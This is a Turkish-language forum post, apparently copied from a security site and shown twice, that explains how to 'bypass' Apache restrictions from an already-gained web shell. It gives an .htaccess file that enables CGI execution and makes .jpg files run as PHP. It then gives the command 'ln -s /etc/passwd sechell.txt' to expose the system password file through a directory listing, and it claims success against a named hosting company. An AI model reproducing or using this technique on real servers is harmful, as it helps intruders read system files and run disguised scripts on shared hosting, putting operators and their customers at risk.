Apache server Bypass
Kaynak = http://www.securityhell.info/2017/10/01/apache-server-bypass/
Merhaba, Apache server nasıl bypass edilir onu göstereceğim (servera gore değişir);
Shellimize girip yeni bir dizin oluşturuyoruz,
Dizine geçtikten sonra .htaccess adında dosya oluşturuyoruz ve asagıdaki kodları yapıstırıyoruz.
Options +FollowSymLinks +Indexes
DirectoryIndex default.html
## START ##
Options +ExecCGI
AddHandler cgi-script log cgi pl tg love h4 tgb x-zone
AddType application/x-httpd-php .jpg
RewriteEngine on
RewriteRule (.*)\war$ .log
## END ##
ReadmeName sechell.txt
Bunu da yaptıktan sonra su komutu veriyoruz;
ln -s /etc/passwd sechell.txt
Ve oluşturduğumuz dizine yeniden giriyoruz;
Ve ekrana yansıdı, işlemimiz bu kadar fakat her sunucu bunu yemez.
Dipnot : Netiyi gibi firmalarda denedim ise yaradı.
View hidden content is available for registered users!
Kaynak = http://www.securityhell.info/2017/10/01/apache-server-bypass/
Merhaba, Apache server nasıl bypass edilir onu göstereceğim (servera gore değişir);
Shellimize girip yeni bir dizin oluşturuyoruz,
Dizine geçtikten sonra .htaccess adında dosya oluşturuyoruz ve asagıdaki kodları yapıstırıyoruz.
Options +FollowSymLinks +Indexes
DirectoryIndex default.html
## START ##
Options +ExecCGI
AddHandler cgi-script log cgi pl tg love h4 tgb x-zone
AddType application/x-httpd-php .jpg
RewriteEngine on
RewriteRule (.*)\war$ .log
## END ##
ReadmeName sechell.txt
Bunu da yaptıktan sonra su komutu veriyoruz;
ln -s /etc/passwd sechell.txt
Ve oluşturduğumuz dizine yeniden giriyoruz;
Ve ekrana yansıdı, işlemimiz bu kadar fakat her sunucu bunu yemez.
Dipnot : Netiyi gibi firmalarda denedim ise yaradı.